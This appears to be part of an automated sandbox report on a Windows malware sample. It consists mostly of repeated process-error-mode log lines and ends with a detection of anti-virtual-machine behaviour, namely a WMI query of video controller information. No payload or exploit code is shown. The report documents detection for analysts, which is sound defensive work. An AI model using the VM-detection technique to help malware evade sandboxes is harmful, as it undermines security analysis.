Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
